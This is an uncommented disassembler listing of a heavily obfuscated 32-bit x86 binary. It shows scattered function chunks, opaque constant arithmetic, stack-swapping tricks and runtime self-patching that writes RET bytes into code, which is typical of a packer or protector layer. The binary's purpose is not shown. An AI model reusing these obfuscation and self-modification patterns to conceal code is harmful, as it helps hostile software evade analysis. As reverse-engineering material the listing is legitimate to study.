; START	OF FUNCTION CHUNK FOR sub_43D16B

loc_4583D2:				; CODE XREF: sub_43D16B+4D1Dj
		jmp	loc_4401F0
; END OF FUNCTION CHUNK	FOR sub_43D16B
; ---------------------------------------------------------------------------
		xchg	ebx, [ebp+0]
		sub	eax, 909313C2h
		mov	ecx, [eax]
		jmp	loc_44ED08
; ---------------------------------------------------------------------------

loc_4583E7:				; DATA XREF: sub_451429+Fo
		xchg	ecx, [esp]
		mov	edi, ecx
; START	OF FUNCTION CHUNK FOR sub_449CC8

loc_4583EC:				; CODE XREF: sub_449CC8:loc_446245j
		pop	ecx
		rol	edi, 9
		add	edi, 560030D1h
		and	edi, 9DF4D4DDh

loc_4583FC:				; CODE XREF: sub_458F33:loc_43BE0Dj
		add	edi, 0EABFCE88h
		xchg	edi, [esp-4+arg_0]
		jmp	sub_43A87E
; END OF FUNCTION CHUNK	FOR sub_449CC8
; ---------------------------------------------------------------------------
		cmp	edx, ecx
		jmp	loc_45696E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B69F

loc_458411:				; CODE XREF: sub_44B69F+32CBj
		mov	eax, [ecx]

loc_458413:				; CODE XREF: sub_44B69F:loc_44E962j
		add	eax, 0AA6EC485h
		call	sub_44346F

loc_45841E:				; CODE XREF: sub_4500FA-142FEj
					; hvvrg7ie:0043D43Dj
		jz	loc_43F985

loc_458424:				; CODE XREF: sub_448BC0:loc_4549FEj
		xor	ecx, 6C1D8799h
		sub	ecx, 0FCB6016h
		add	ecx, 3A1E68ABh
		xchg	ecx, [esp+4+var_4]
		jmp	loc_451FE5
; END OF FUNCTION CHUNK	FOR sub_44B69F
; ---------------------------------------------------------------------------
		jns	loc_4592A0
		and	esi, ebx
		jmp	loc_43E10E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_45844B:				; CODE XREF: sub_44616F:loc_4403E2j
		add	edx, 0A0E4D36Dh
		or	edx, 79866E26h
		add	edx, 1DEAF660h
		add	edx, ebp
		add	edx, 0E62E1B3Ah
		jmp	loc_44DFD8
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_45846A:				; CODE XREF: sub_44E533-A721j
		jz	loc_448B89
		jmp	loc_44A5A5
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_458475:				; CODE XREF: sub_45A234:loc_449855j
					; hvvrg7ie:00449866j
		and	eax, 35B2131Ah
		jnz	loc_451140
		not	ecx
		cmp	esi, 0B094A3CCh
		jmp	loc_45113A
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------

loc_45848E:				; CODE XREF: hvvrg7ie:00446F46j
		rol	edx, 19h
		add	edx, 0D5232E5Dh
		add	edx, ebp
		add	edx, 0D8642EF8h
		mov	edx, [edx]
		imul	byte ptr [edx]
		jmp	loc_44A961

; =============== S U B	R O U T	I N E =======================================



sub_4584A8	proc near		; CODE XREF: hvvrg7ie:00441D24p
					; hvvrg7ie:004509D6j

; FUNCTION CHUNK AT 00444F0C SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		call	sub_450C5A
		push	ebx
		push	offset sub_44CAB0
		jmp	loc_444F0C
sub_4584A8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4584BC:				; CODE XREF: sub_440643:loc_4437F7j
					; sub_440643+F35Bj
		call	sub_44DE0A

loc_4584C1:				; CODE XREF: hvvrg7ie:loc_43AFF9j
		mov	edx, 0CB804A30h
		call	sub_446A16
		push	edi
		mov	edi, eax
		xchg	edi, [esp+0]
		jmp	loc_441AA2
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DDD

loc_4584D6:				; CODE XREF: sub_441DDD:loc_44DD76j
		mov	eax, [esp+8+var_8]
		push	edx
		push	esi
		push	0E80ED9F4h
		pop	esi
		sub	esi, ds:4000F6h
		and	esi, 20119396h
		jmp	loc_446BD7
; END OF FUNCTION CHUNK	FOR sub_441DDD

; =============== S U B	R O U T	I N E =======================================



sub_4584F2	proc near		; CODE XREF: sub_443375:loc_439493j
					; sub_44CEC8:loc_43A5E0p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00442503 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00443F8F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448E6D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A0C1 SIZE 0000000B BYTES

		jnz	loc_448E6D
		push	ebp
		mov	ebp, esp
		push	offset loc_449F99
		jmp	nullsub_312
sub_4584F2	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451176

loc_458505:				; CODE XREF: sub_451176-73Aj
		rol	eax, 7
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+0]

loc_45850E:				; CODE XREF: hvvrg7ie:loc_44C832j
		mov	ecx, eax
		jmp	loc_442F83
; END OF FUNCTION CHUNK	FOR sub_451176
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_458515:				; CODE XREF: sub_43D285+736Fj
		xor	eax, 6B7807Ah
		push	offset sub_449C2D
		jmp	nullsub_313
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------

loc_458525:				; CODE XREF: hvvrg7ie:00448B55j
		jz	loc_44DDC0
; START	OF FUNCTION CHUNK FOR sub_43EA21

loc_45852B:				; CODE XREF: sub_43EA21-14Cj
		jmp	nullsub_328
; END OF FUNCTION CHUNK	FOR sub_43EA21
; ---------------------------------------------------------------------------
		rol	ebx, 16h
		popf
		jmp	loc_44DDBE
; ---------------------------------------------------------------------------
		test	eax, eax
		jz	loc_44A3DE
		jmp	loc_444958
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_458546:				; CODE XREF: sub_43EB47+19D95j
		rol	eax, 14h

loc_458549:				; CODE XREF: hvvrg7ie:0044BDE6j
		add	eax, 5B9ECCF3h
		add	eax, ebp
		add	eax, 0B214CC5Fh
		jmp	loc_458CA3
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D2D8

loc_45855C:				; CODE XREF: sub_43D2D8:loc_449B28j
		push	0D6697332h
		pop	ecx
		add	ecx, 7B05CC1Ch
		sub	ecx, ds:4000F9h
		add	ecx, 87B453FEh
		rol	ecx, 1
		jmp	loc_43EAD7
; END OF FUNCTION CHUNK	FOR sub_43D2D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CCA

loc_45857B:				; CODE XREF: sub_448CCA+EF1Cj
		sub	edx, 5AFEF3F0h
		add	edx, 0DB437BF3h
		call	sub_448FC5

loc_45858C:				; CODE XREF: sub_448FB0-6150j
		jmp	nullsub_314
; END OF FUNCTION CHUNK	FOR sub_448CCA

; =============== S U B	R O U T	I N E =======================================



sub_458591	proc near		; DATA XREF: hvvrg7ie:0043FBF1o

; FUNCTION CHUNK AT 0043BA68 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004451DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446BF5 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044877E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045614B SIZE 0000000B BYTES

		push	36595526h
		pop	edi
		and	edi, 26B4E055h
		rol	edi, 5
		jmp	loc_45614B
sub_458591	endp


; =============== S U B	R O U T	I N E =======================================



sub_4585A5	proc near		; CODE XREF: hvvrg7ie:00447430j
					; hvvrg7ie:loc_44E43Fp
		xchg	ecx, [esp+0]
		pop	ecx
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_449EA4
		jmp	loc_457ABA
sub_4585A5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4585B8:				; CODE XREF: hvvrg7ie:0043C779j
		ror	ebp, 11h

; =============== S U B	R O U T	I N E =======================================



sub_4585BB	proc near		; CODE XREF: hvvrg7ie:0045881Ep

; FUNCTION CHUNK AT 0043EE01 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043FD96 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E5DD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004509F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004546AB SIZE 00000014 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	0BECFD068h
		pop	esi
		or	esi, 9F2799A9h
		and	esi, 0BF92E2DCh
		xor	esi, 9039E479h
		jmp	loc_4509F9
sub_4585BB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4585DC:				; DATA XREF: sub_456A52:loc_44520Ao
		jmp	loc_43FB52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_4585E1:				; CODE XREF: sub_4462F9-98DEj
					; sub_456A52-16A92j
		xchg	edx, [esp+0]
		mov	ecx, edx
		pop	edx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445E8E

loc_4585E9:				; CODE XREF: sub_445E8E+1EFBj
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_445E8E

; =============== S U B	R O U T	I N E =======================================



sub_4585EE	proc near		; CODE XREF: sub_4466CE:loc_43B7A7j
					; hvvrg7ie:0043D78Ap ...
		push	ebp
		jmp	loc_459F23
sub_4585EE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E68D

loc_4585F4:				; CODE XREF: sub_44E68D:loc_44A945j
		mov	byte ptr [eax],	0C3h
		jmp	loc_459767
; ---------------------------------------------------------------------------

loc_4585FC:				; CODE XREF: sub_44E68D:loc_459767j
		xchg	edi, [esp+0]
		mov	edx, edi
		pop	edi
		mov	eax, [esp-4+arg_0]
		jmp	loc_441172
; END OF FUNCTION CHUNK	FOR sub_44E68D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A91B

loc_45860A:				; CODE XREF: sub_45A91B-18E4Dj
		mov	edx, eax
		pop	eax
		mov	eax, [esp-4+arg_0]
		push	edx
		push	offset sub_43E77C
		jmp	loc_44C7A5
; END OF FUNCTION CHUNK	FOR sub_45A91B

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_45861B	proc near		; CODE XREF: sub_44398A+5204j
		retn
sub_45861B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4410E1

loc_45861C:				; CODE XREF: sub_4410E1+44DEj
		call	sub_4487D6

loc_458621:				; CODE XREF: sub_440643:loc_4533C5j
		sub	ebx, 8EF7C107h
		cmp	ebx, 9056121Ah
		jmp	loc_45172C
; END OF FUNCTION CHUNK	FOR sub_4410E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_458632:				; CODE XREF: sub_45A7E8+Aj
		sub	eax, 0CC0F66DAh
		xor	eax, 4C27C462h
		add	eax, 0D65C7E23h
		jb	loc_43DA85
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; START	OF FUNCTION CHUNK FOR sub_457A97

loc_45864A:				; CODE XREF: sub_457A97-F1B1j
		jmp	loc_454FFC
; END OF FUNCTION CHUNK	FOR sub_457A97
; ---------------------------------------------------------------------------
		or	esi, 0F5F6B56Ah
		cmp	ebp, 7BA44128h
		jmp	loc_43DA7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA70

loc_458660:				; CODE XREF: sub_43CA70+1809Cj
		push	500E2B97h
		push	offset sub_45AF9C
		jmp	loc_43B238
; END OF FUNCTION CHUNK	FOR sub_43CA70
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45717D

loc_45866F:				; CODE XREF: sub_45717D:loc_44115Dj
		push	offset sub_44FED8
		jmp	loc_457B50
; END OF FUNCTION CHUNK	FOR sub_45717D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_458679:				; CODE XREF: sub_441FE4+85F6j
		mov	ecx, 754A1A0Ah
		cmp	esi, 1FB6C92Ch
		jmp	loc_45AB73
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------
		call	sub_451BAD

; =============== S U B	R O U T	I N E =======================================



sub_45868E	proc near		; CODE XREF: hvvrg7ie:00448802j
					; hvvrg7ie:0044A00Fp

; FUNCTION CHUNK AT 00454A66 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, 8556D20Eh
		add	eax, ebp
		add	eax, 535B9CEh
		mov	eax, [eax]
		jmp	loc_454A66
sub_45868E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4586A7:				; DATA XREF: sub_4405AA+EDBBo
		xchg	eax, [esp]
		jmp	loc_44147E
; ---------------------------------------------------------------------------

loc_4586AF:				; CODE XREF: hvvrg7ie:00449822j
		mov	ecx, esi

loc_4586B1:				; CODE XREF: hvvrg7ie:loc_44AA75j
		push	2F31C708h
		pop	eax
		or	eax, 94322FB1h
		cmp	eax, 4EC5C5Dh
		jmp	loc_44D4BD
; ---------------------------------------------------------------------------

loc_4586C8:				; DATA XREF: sub_453405:loc_443C9Ao
		pop	ecx
		xchg	eax, [esp]
		shr	ebp, 0Ch
		jmp	loc_43AD0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4586D4:				; CODE XREF: sub_440643+CA90j
		jnz	loc_455F9E
		shr	edi, 0Bh
		mov	ebx, 0BE904905h

loc_4586E2:				; CODE XREF: sub_440643:loc_44D0C4j
		add	esi, 0D2A48A9Eh
		xchg	esi, [esp+0]
		jmp	sub_44AA5B
; END OF FUNCTION CHUNK	FOR sub_440643

; =============== S U B	R O U T	I N E =======================================



sub_4586F0	proc near		; DATA XREF: sub_4424A6-94Bo

var_4		= dword	ptr -4

		push	edx
		mov	edx, eax
		xchg	edx, [esp+4+var_4]
		call	sub_43E7F3
		retn
sub_4586F0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451BC8

loc_4586FC:				; CODE XREF: sub_451BC8+12j
		jmp	loc_43A4B9
; END OF FUNCTION CHUNK	FOR sub_451BC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45190C

loc_458701:				; CODE XREF: sub_45190C+7j
		jmp	loc_447B11
; END OF FUNCTION CHUNK	FOR sub_45190C

; =============== S U B	R O U T	I N E =======================================



sub_458706	proc near		; CODE XREF: sub_450F97-14858p
					; sub_43EB47:loc_43DBB3p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E375 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043E7B4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044470B SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00445ED1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447FB0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044ABD5 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00452A84 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045418F SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004561FB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045782C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004593E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B031 SIZE 00000005 BYTES

		jz	loc_45782C
		push	ebp
		call	sub_43EF3E
		push	414218DFh
		pop	eax
		rol	eax, 17h
		push	offset sub_43C562
		jmp	nullsub_320
sub_458706	endp

; ---------------------------------------------------------------------------

locret_458725:				; CODE XREF: hvvrg7ie:0044213Fj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_458726:				; CODE XREF: sub_44D2F8-A0E1j
		jmp	loc_448A62
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442301

loc_45872B:				; CODE XREF: sub_442301+12j
		jmp	loc_43F8BB
; END OF FUNCTION CHUNK	FOR sub_442301
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD46

loc_458730:				; CODE XREF: sub_45AD46:loc_43B8B4j
		sub	edx, 1CBB6C03h
		xor	edx, 82F12233h
		push	offset sub_44242E
		jmp	loc_44D58F
; END OF FUNCTION CHUNK	FOR sub_45AD46

; =============== S U B	R O U T	I N E =======================================



sub_458746	proc near		; CODE XREF: hvvrg7ie:0044AF2Bj
					; sub_44D798+6p

; FUNCTION CHUNK AT 0043ABCA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043FD91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445514 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00447C17 SIZE 0000000C BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	edx
		push	0CB65D65Fh
		pop	edx
		jmp	loc_43FD91
sub_458746	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_458756:				; CODE XREF: sub_450434-F1D7j
		jz	loc_439017
		jmp	loc_43936B
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------

loc_458761:				; CODE XREF: hvvrg7ie:0043C3C5j
		sub	ecx, 6E929BD6h
		rol	ecx, 15h
		add	ecx, 0F3202F0Ah
		call	sub_440ACD
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_458775:				; CODE XREF: sub_456F9F-11831j
		jmp	loc_447C64
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_45877A:				; CODE XREF: sub_455087-1319Cj
		jmp	loc_4475FB
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DE4

loc_45877F:				; CODE XREF: sub_448DE4-E025j
		jmp	loc_447322
; END OF FUNCTION CHUNK	FOR sub_448DE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E56

loc_458784:				; CODE XREF: sub_443E56+9346j
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_43C836
		mov	eax, 649E33C4h
		jmp	loc_4461D8
; END OF FUNCTION CHUNK	FOR sub_443E56
; ---------------------------------------------------------------------------
		popf
		jmp	sub_43933B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AE42

loc_45879D:				; CODE XREF: sub_44AE42:loc_44C219j
		rol	ecx, 16h
		add	ecx, 395024h
		mov	[ecx], eax
		pop	ecx
		lea	eax, sub_448881
		mov	byte ptr [eax],	0C3h
		jmp	loc_457D25
; END OF FUNCTION CHUNK	FOR sub_44AE42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448881

loc_4587B7:				; CODE XREF: sub_448881:loc_456AA1j
		mov	eax, [esp-8+arg_4]
		jmp	loc_442C95
; END OF FUNCTION CHUNK	FOR sub_448881
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_4587BF:				; CODE XREF: sub_43C0DE+8BB3j
		sub	esi, 82D1483Bh
		add	esi, 0EB59ED35h
		popf
		call	sub_4401C9

loc_4587D1:				; CODE XREF: sub_456535+Cj
		jmp	loc_43D1E5
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DB2

loc_4587D6:				; CODE XREF: sub_448DB2:loc_44AF10j
		mov	edi, eax
		xchg	edi, [esp-4+arg_0]
		mov	eax, edx
		push	offset loc_451775
		jmp	sub_454318
; END OF FUNCTION CHUNK	FOR sub_448DB2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451703

loc_4587E7:				; CODE XREF: sub_451703:loc_458D65j
		mov	dword ptr [ebp-0F8h], 206461h
		mov	dword ptr [ebp-108h], 0Bh
; END OF FUNCTION CHUNK	FOR sub_451703
; START	OF FUNCTION CHUNK FOR sub_455087

loc_4587FB:				; CODE XREF: sub_455087:loc_455093j
		jz	loc_43C235
		push	7F3BE3C2h
		pop	eax
		sub	eax, 7FCB251Dh
		add	eax, 0D85FDC0Dh
		add	eax, ebp
		jmp	loc_44AA4C
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------

loc_45881A:				; CODE XREF: hvvrg7ie:loc_4512C8j
		mov	eax, ecx
		pop	ecx
		push	esi
		call	sub_4585BB
; START	OF FUNCTION CHUNK FOR sub_455B13

loc_458823:				; CODE XREF: sub_455B13-3753j
		jmp	loc_44CE78
; END OF FUNCTION CHUNK	FOR sub_455B13
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450590

loc_458828:				; CODE XREF: sub_450590+571j
		jmp	loc_45020E
; END OF FUNCTION CHUNK	FOR sub_450590
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B547

loc_45882D:				; CODE XREF: sub_43B547+A577j
		jmp	loc_43EC24
; END OF FUNCTION CHUNK	FOR sub_43B547
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_458832:				; CODE XREF: sub_444BE1:loc_44A3DEj
		cmp	byte ptr [ebp-5], 0
		jnz	loc_458EC6
		jmp	loc_4518A4
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451BAD

loc_458841:				; CODE XREF: sub_451BAD:loc_4508C7j
		pop	edx
		or	edx, 9604634Eh
		and	edx, 1DB302A5h
		add	edx, 0EA924AC3h
		push	offset loc_444D85
		jmp	nullsub_553
; END OF FUNCTION CHUNK	FOR sub_451BAD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AC5

loc_45885E:				; CODE XREF: sub_440AC5+3j
		xchg	ebx, [esp+4+var_4]
		mov	ebp, esp
		push	ecx
		push	offset loc_4519E3
		jmp	loc_4404B5
; END OF FUNCTION CHUNK	FOR sub_440AC5
; ---------------------------------------------------------------------------
		mov	ds:dword_41D120, eax
		lea	eax, nullsub_493
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_493
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		jmp	loc_4567DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB53

loc_45888B:				; CODE XREF: sub_44DB53+93C0j
		push	0C6BA60C2h
		ror	esi, 9
		popf
		mov	ecx, [edx]
		jmp	loc_452A25
; END OF FUNCTION CHUNK	FOR sub_44DB53

; =============== S U B	R O U T	I N E =======================================



sub_45889B	proc near		; CODE XREF: hvvrg7ie:0044D224j
					; sub_4571C8p

var_C		= dword	ptr -0Ch
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043983D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00439F4B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B70D SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043D3F1 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043E32A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043FE73 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00441D8B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00442C9F SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004433FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004438BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443B6C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004441B6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004467B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A2F8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044A9B1 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044ABC9 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044AC30 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044AD61 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AEC5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B467 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044BC64 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044BD1C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044CEDA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D884 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044DE8C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E3D1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044E97F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044EC36 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044F665 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F72A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044FAAB SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0044FAC3 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00450235 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450678 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004506F0 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004520E3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00453090 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045338A SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045401F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045448B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004545E9 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004549B9 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00456C96 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457875 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A510 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045ACA0 SIZE 00000015 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	ebp
		mov	ebp, esp
		call	sub_43AB99

loc_4588A7:				; CODE XREF: hvvrg7ie:00459409j
		jmp	loc_44ABC9
sub_45889B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EA21

loc_4588AC:				; CODE XREF: sub_43EA21+9j
		jmp	loc_43D4B7
; END OF FUNCTION CHUNK	FOR sub_43EA21
; ---------------------------------------------------------------------------

loc_4588B1:				; CODE XREF: hvvrg7ie:loc_454996j
		jnz	loc_45B1BE
		jmp	loc_442F8C
; ---------------------------------------------------------------------------
		lea	eax, sub_44C9B0
		mov	[ebp-4], eax
		call	sub_456A52
		mov	ds:dword_43D708, eax
		xor	eax, eax
		push	ebp
		mov	ebp, ecx
		jmp	loc_45209D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_4588D9:				; CODE XREF: sub_43EB47:loc_43E9C5j
					; hvvrg7ie:0044BDF2j
		push	eax
		mov	esi, ebx
		jmp	loc_458546
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
		not	ebp
		jmp	sub_4418F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4410E1

loc_4588E8:				; CODE XREF: sub_4410E1:loc_45172Cj
		jge	loc_455E85

loc_4588EE:				; CODE XREF: hvvrg7ie:0044A7D4j
		jmp	nullsub_329
; END OF FUNCTION CHUNK	FOR sub_4410E1
; ---------------------------------------------------------------------------
		cmp	ecx, ebp
		jmp	loc_455E7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443DF4

loc_4588FA:				; CODE XREF: sub_443DF4:loc_44884Bj
		push	0C883F63Fh
		pop	ecx
		and	ecx, 0B050D074h
		xor	ecx, 7255E86Dh
		add	ecx, 0DEF7298h
		xchg	ecx, [esp+0]
		jmp	loc_45B73F
; END OF FUNCTION CHUNK	FOR sub_443DF4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441167

loc_45891A:				; CODE XREF: sub_441167+C7D7j
		jz	loc_45AF36

loc_458920:				; CODE XREF: sub_44A1B5-1013Aj
		jmp	nullsub_330
; END OF FUNCTION CHUNK	FOR sub_441167
; ---------------------------------------------------------------------------
		adc	eax, ebp
		shr	edi, 12h
		jmp	loc_45AF36
; ---------------------------------------------------------------------------

loc_45892F:				; CODE XREF: hvvrg7ie:0044367Cj
		mov	ebx, [edi]

; =============== S U B	R O U T	I N E =======================================



sub_458931	proc near		; CODE XREF: hvvrg7ie:loc_45B613p

; FUNCTION CHUNK AT 0045B23F SIZE 0000000F BYTES

		xchg	eax, [esp+0]
		pop	eax
		call	sub_450C5A
		push	ecx
		push	7E0B6BC0h
		jmp	loc_45B23F
sub_458931	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4563DC

loc_458945:				; CODE XREF: sub_4563DC:loc_4397D8j
		jnz	loc_459B7C
		jmp	loc_43F504
; END OF FUNCTION CHUNK	FOR sub_4563DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E20

loc_458950:				; CODE XREF: sub_447E20:loc_45A84Fj
		rol	eax, 12h
		push	eax
; END OF FUNCTION CHUNK	FOR sub_447E20
